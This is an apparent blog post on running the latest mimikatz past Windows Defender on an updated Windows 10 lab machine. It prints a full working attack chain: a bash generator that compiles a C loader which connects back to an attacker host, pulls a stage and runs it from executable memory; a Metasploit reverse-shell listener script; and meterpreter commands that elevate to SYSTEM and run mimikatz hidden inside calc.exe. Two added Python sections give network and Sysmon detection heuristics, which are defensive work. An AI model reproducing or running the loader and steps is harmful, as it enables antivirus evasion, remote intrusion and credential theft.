I have been keeping this journal for 7 years now, and I guess that is a reason to add some interesting stuff (lately I have been busy in the compiler world on various architectures and different developer boards).
Here is a short little exercise for this evening: getting the latest mimikatz running on a Windows 10 machine (build 10.0.16299.192) with all the latest updates installed and Windows Defender enabled.
Microsoft has gotten really good at detecting all sorts of techniques, and even a good custom ps1 mimikatz script that I have used a lot in the past now gets flagged.
That customized method no longer works: https://astr0baby.wordpress.com/2017/03/28/mimikatz-2-1-1-powershell-generator/
So I played a little with my other generator scripts and came up with the following, which has always been reliable; all I had to do was make it produce a 64-bit PE32+ executable and start a listener for a 64-bit reverse shell.
Here are my scripts and steps (make sure you have the mingw-w64 cross-compiler packages installed):
ii binutils-mingw-w64-x86-64 2.26-3ubuntu1+6.6 amd64 Cross-binutils for Win64 (x64) using MinGW-w64
ii g++-mingw-w64-x86-64 5.3.1-8ubuntu3+17 amd64 GNU C++ compiler for MinGW-w64 targeting Win64
ii gcc-mingw-w64-x86-64 5.3.1-8ubuntu3+17 amd64 GNU C compiler for MinGW-w64 targeting Win64
ii mingw-w64-x86-64-dev 4.0.4-2 all Development files for MinGW-w64 targeting Win64
#!/bin/bash
clear
echo "****************************************************************"
echo " Automatic C source code generator - FOR METASPLOIT "
echo " Based on rsmudge metasploit-loader "
echo " PE32+ executable (GUI) x86-64 "
echo "****************************************************************"
echo -en 'Metasploit server IP : '
read ip
echo -en 'Metasploit port number : '
read port
echo '#include <stdio.h>'> temp.c
echo '#include <stdlib.h>' >> temp.c
echo '#include <winsock2.h>' >> temp.c
echo '#include <windows.h>' >> temp.c
echo -n 'unsigned char server[]="' >> temp.c
echo -n $ip >> temp.c
echo -n '";' >> temp.c
echo '' >> temp.c
echo -n 'unsigned char serverp[]="' >> temp.c
echo -n $port >> temp.c
echo -n '";' >> temp.c
echo '' >> temp.c
echo 'void winsock_init() {' >> temp.c
echo ' WSADATA wsaData;' >> temp.c
echo ' WORD wVersionRequested;' >> temp.c
echo ' wVersionRequested = MAKEWORD(2, 2);'>> temp.c
echo ' if (WSAStartup(wVersionRequested, &wsaData) < 0) {' >> temp.c
echo ' printf("bad\n"); '>> temp.c
echo ' WSACleanup(); '>> temp.c
echo ' exit(1);'>> temp.c
echo ' }' >> temp.c
echo ' }' >> temp.c
echo ' void punt(SOCKET my_socket, char * error) {' >> temp.c
echo ' printf("r %s\n", error);'>> temp.c
echo ' closesocket(my_socket);'>> temp.c
echo ' WSACleanup();'>> temp.c
echo ' exit(1);' >> temp.c
echo ' }' >> temp.c
echo ' int recv_all(SOCKET my_socket, void * buffer, int len) {' >> temp.c
echo ' int tret = 0;'>> temp.c
echo ' int nret = 0;'>>temp.c
echo ' void * startb = buffer;'>> temp.c
echo ' while (tret < len) {'>>temp.c
echo ' nret = recv(my_socket, (char *)startb, len - tret, 0);'>> temp.c
echo ' startb += nret;'>> temp.c
echo ' tret += nret;'>>temp.c
echo ' if (nret == SOCKET_ERROR)'>> temp.c
echo ' punt(my_socket, "no data");'>> temp.c
echo ' }'>>temp.c
echo ' return tret;'>> temp.c
echo '}' >> temp.c
echo 'SOCKET wsconnect(char * targetip, int port) {'>> temp.c
echo ' struct hostent * target;' >> temp.c
echo ' struct sockaddr_in sock;' >> temp.c
echo ' SOCKET my_socket;'>>temp.c
echo ' my_socket = socket(AF_INET, SOCK_STREAM, 0);'>> temp.c
echo ' if (my_socket == INVALID_SOCKET)'>> temp.c
echo ' punt(my_socket, ".");'>>temp.c
echo ' target = gethostbyname(targetip);'>>temp.c
echo ' if (target == NULL)'>>temp.c
echo ' punt(my_socket, "..");'>>temp.c
echo ' memcpy(&sock.sin_addr.s_addr, target->h_addr, target->h_length);'>>temp.c
echo ' sock.sin_family = AF_INET;'>> temp.c
echo ' sock.sin_port = htons(port);'>>temp.c
echo ' if ( connect(my_socket, (struct sockaddr *)&sock, sizeof(sock)) )'>>temp.c
echo ' punt(my_socket, "...");'>>temp.c
echo ' return my_socket;'>>temp.c
echo '}' >> temp.c
echo 'int main(int argc, char * argv[]) {' >> temp.c
echo ' FreeConsole();'>>temp.c
echo ' Sleep(10);'>>temp.c
echo ' ULONG32 size;'>>temp.c
echo ' char * buffer;'>>temp.c
echo ' void (*function)();'>>temp.c
echo ' winsock_init();'>> temp.c
echo ' SOCKET my_socket = wsconnect(server, atoi(serverp));'>>temp.c
echo ' int count = recv(my_socket, (char *)&size, 4, 0);'>>temp.c
echo ' if (count != 4 || size <= 0)'>>temp.c
echo ' punt(my_socket, "error lenght\n");'>>temp.c
echo ' buffer = VirtualAlloc(0, size + 5, MEM_COMMIT, PAGE_EXECUTE_READWRITE);'>>temp.c
echo ' if (buffer == NULL)'>>temp.c
echo ' punt(my_socket, "error in buf\n");'>>temp.c
echo ' buffer[0] = 0xBF;'>>temp.c
echo ' memcpy(buffer + 1, &my_socket, 4);'>>temp.c
echo ' count = recv_all(my_socket, buffer + 5, size);'>>temp.c
echo ' function = (void (*)())buffer;'>>temp.c
echo ' function();'>>temp.c
echo ' return 0;'>>temp.c
echo '}' >> temp.c
echo '(+) Compiling binary ..'
x86_64-w64-mingw32-gcc temp.c -o payload.exe -lws2_32 -mwindows
ls -la temp.c
strip payload.exe
file=`ls -la payload.exe` ; echo '(+)' $file
This will generate a loader called payload.exe which you can execute on the Windows 10 lab machine (I used "Run as administrator" so that I could inject the latest 64-bit mimikatz.exe into memory from the spawned reverse shell).
My listener on the attacking machine running Metasploit is as follows:
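From the network side, the loader above has a recognisable shape: the client connects and sends nothing, the handler answers with a 4-byte little-endian length, and then delivers exactly that many bytes, which the loader executes. The following Python is an added example of my own (not code from the original post) that turns that framing into a flow-level heuristic; the flow records, the 64 KiB size threshold and the field names are constructed for the example and would need tuning against real captures.

```python
"""Flow-level heuristic for a server-first, length-prefixed stage download.

Added example; not code from the original post. Flow records are constructed.
"""
import struct

# Stages are large; tiny server-first messages (banners, greetings) are not.
# Assumption: threshold chosen for illustration, tune for your environment.
MIN_STAGE_BYTES = 64 * 1024


def declared_stage_length(server_to_client: bytes):
    """Return the length a 4-byte little-endian prefix declares, or None."""
    if len(server_to_client) < 4:
        return None
    return struct.unpack("<I", server_to_client[:4])[0]


def looks_like_staged_download(flow: dict) -> bool:
    """True when a TCP flow matches the loader's framing:
    - the server spoke first (client sent no bytes before the first reply),
    - the first 4 bytes are a little-endian length,
    - the server then delivered at least that many bytes,
    - and the declared size is large enough to be a stage, not a banner.
    """
    if flow["client_bytes_before_reply"] != b"":
        return False
    declared = declared_stage_length(flow["server_to_client"])
    if declared is None or declared < MIN_STAGE_BYTES:
        return False
    delivered = len(flow["server_to_client"]) - 4
    return delivered >= declared


# Constructed flows (no real captures). The first mimics the loader: silence
# from the client, then a 4-byte length and a zero-filled blob of that size.
STAGE_SIZE = 70_000
SAMPLE_FLOWS = {
    "reverse_tcp_stage": {
        "client_bytes_before_reply": b"",
        "server_to_client": struct.pack("<I", STAGE_SIZE) + b"\x00" * STAGE_SIZE,
    },
    # TLS: the client speaks first (ClientHello record header 0x16 0x03 0x01).
    "https": {
        "client_bytes_before_reply": b"\x16\x03\x01\x00\xc8\x01\x00\x00\xc4",
        "server_to_client": b"\x16\x03\x03\x00\x5a\x02\x00\x00\x56" + b"\x00" * 86,
    },
    # SSH: the server speaks first, but "SSH-" read as a LE length is far
    # larger than the bytes actually delivered, so it is not flagged.
    "ssh": {
        "client_bytes_before_reply": b"",
        "server_to_client": b"SSH-2.0-OpenSSH_7.6p1 Ubuntu-4\r\n",
    },
}


def classify_flows(flows: dict) -> dict:
    """Map each flow name to whether it matches the staged-download heuristic."""
    return {name: looks_like_staged_download(f) for name, f in flows.items()}


if __name__ == "__main__":
    for name, hit in classify_flows(SAMPLE_FLOWS).items():
        print(f"{name:18s} staged-download={hit}")
```

The SSH case is there on purpose: a server-speaks-first check alone would fire on every SSH banner, so the heuristic also requires that the declared length be plausible and actually delivered. In a real sensor this would run over reassembled TCP streams, and the same rule applies whatever port the handler listens on.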
#!/bin/bash
clear
echo "***************************************************************"
echo " X86-64 meterpreter reverse tcp listener loader "
echo "***************************************************************"
echo -e "What IP are we gonna listen to ? \c"
read host
echo -e "What Port Number are we gonna listen to? : \c"
read port
echo "Starting the meterpreter listener.."
echo -n './msfconsole -x "use exploit/multi/handler; set PAYLOAD windows/x64/meterpreter/reverse_tcp ; set LHOST ' > run.listener.sh
echo -n $host >> run.listener.sh
echo -n '; set LPORT ' >> run.listener.sh
echo -n $port >> run.listener.sh
echo -n '; run"' >> run.listener.sh
chmod +x run.listener.sh
./run.listener.sh
Run the above script from your Metasploit directory, then execute payload.exe on the test machine.
Once the reverse shell is connected, run getsystem to elevate to NT AUTHORITY\SYSTEM and execute the latest 64-bit mimikatz.exe.
Mimikatz 2.1.1-20180127 https://github.com/gentilkiwi/mimikatz/releases/tag/2.1.1-20180127
Download and extract it, copy x64/mimikatz.exe to your Metasploit root directory, then execute it with the following command:
meterpreter > execute -H -i -c -f /home/user/metasploit-framework/mimikatz.exe -m -d calc.exe
This gives you the latest mimikatz running in memory, with all the new and interesting features such as DCShadow.
Of course we can also have some fun with DPAPI in Windows (as described here: https://github.com/gentilkiwi/mimikatz/wiki/howto-~-scheduled-tasks-credentials).
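On the host side, the steps above leave two footprints that Sysmon records even when the binaries themselves are not flagged: payload.exe, living in a user-writable directory, initiates the outbound connection (Event ID 3), and mimikatz, run in memory with `execute -m -d calc.exe`, reads LSASS from a process whose image name is the dummy calc.exe (Event ID 10, with PROCESS_VM_READ in GrantedAccess). The following Python is an added example of my own, not code from the original post or from the mimikatz or Metasploit projects; the events, paths, addresses and the LSASS-reader allowlist are constructed for illustration and the allowlist would be tuned per environment.

```python
"""Two Sysmon-based checks for the loader and the in-memory mimikatz run.

Added example; not code from the original post. Events are constructed.
  - Event ID 3: an executable in a user-writable directory initiating an
    outbound TCP connection (the loader calling back to its handler).
  - Event ID 10: a process outside a known-reader allowlist opening
    lsass.exe with PROCESS_VM_READ (credential dumping from LSASS).
"""

PROCESS_VM_READ = 0x0010  # access right needed to read another process's memory

# Directories an unprivileged user can write to. A dropped loader lives here;
# installed software normally runs from Program Files or System32.
USER_WRITABLE_HINTS = ("\\users\\", "\\programdata\\", "\\temp\\", "\\appdata\\")

# Processes that legitimately read LSASS memory on a stock Windows 10 host.
# Assumption: illustrative allowlist, to be tuned per environment.
LSASS_READER_ALLOWLIST = {
    r"c:\windows\system32\csrss.exe",
    r"c:\windows\system32\wininit.exe",
    r"c:\windows\system32\svchost.exe",
    r"c:\windows\system32\wbem\wmiprvse.exe",
    r"c:\program files\windows defender\msmpeng.exe",
}

# Constructed Sysmon-style events (field names follow Sysmon; values are made up).
SAMPLE_EVENTS = [
    {"EventID": 3, "Image": r"C:\Users\lab\Downloads\payload.exe",
     "Initiated": "true", "DestinationIp": "192.0.2.10", "DestinationPort": 4444},
    {"EventID": 3, "Image": r"C:\Program Files\Mozilla Firefox\firefox.exe",
     "Initiated": "true", "DestinationIp": "203.0.113.5", "DestinationPort": 443},
    {"EventID": 10, "SourceImage": r"C:\Windows\System32\calc.exe",
     "TargetImage": r"C:\Windows\System32\lsass.exe", "GrantedAccess": "0x1010"},
    {"EventID": 10, "SourceImage": r"C:\Windows\System32\csrss.exe",
     "TargetImage": r"C:\Windows\System32\lsass.exe", "GrantedAccess": "0x1400"},
    {"EventID": 10, "SourceImage": r"C:\Windows\System32\wbem\WmiPrvSE.exe",
     "TargetImage": r"C:\Windows\System32\lsass.exe", "GrantedAccess": "0x1010"},
]


def flag_outbound_from_user_path(ev: dict):
    """Alert on an outbound connection started by an image in a user-writable path."""
    if ev.get("EventID") != 3 or str(ev.get("Initiated", "")).lower() != "true":
        return None
    image = ev["Image"].lower()
    if any(hint in image for hint in USER_WRITABLE_HINTS):
        return {"rule": "outbound-from-user-writable-path", "image": ev["Image"],
                "dest": f"{ev['DestinationIp']}:{ev['DestinationPort']}"}
    return None


def flag_lsass_memory_read(ev: dict):
    """Alert when a non-allowlisted process opens lsass.exe with VM_READ."""
    if ev.get("EventID") != 10:
        return None
    if not ev["TargetImage"].lower().endswith("\\lsass.exe"):
        return None
    access = int(ev["GrantedAccess"], 16)
    source = ev["SourceImage"].lower()
    if access & PROCESS_VM_READ and source not in LSASS_READER_ALLOWLIST:
        return {"rule": "lsass-memory-read-by-unexpected-process",
                "source": ev["SourceImage"], "granted_access": ev["GrantedAccess"]}
    return None


RULES = (flag_outbound_from_user_path, flag_lsass_memory_read)


def detect(events: list) -> list:
    """Run every rule over every event and collect the alerts in event order."""
    alerts = []
    for ev in events:
        for rule in RULES:
            hit = rule(ev)
            if hit is not None:
                alerts.append(hit)
    return alerts


if __name__ == "__main__":
    for alert in detect(SAMPLE_EVENTS):
        print(alert)
```

The point of the second rule is that mimikatz never has to appear on disk for this to fire: whatever the dummy process is called, it is not a process that should be opening lsass.exe with read access. The csrss.exe and WmiPrvSE.exe events are there to show the two ways a legitimate access passes (no VM_READ bit, or a known reader).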